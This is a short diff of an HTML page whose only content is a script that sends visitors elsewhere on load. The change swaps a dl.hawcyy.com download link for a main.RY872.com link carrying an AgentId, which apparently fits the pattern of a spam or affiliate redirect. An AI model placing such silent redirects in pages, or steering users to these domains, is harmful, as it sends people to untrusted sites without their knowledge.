--- a/987759.html
+++ b/987759.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=987759&t=1592798823"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
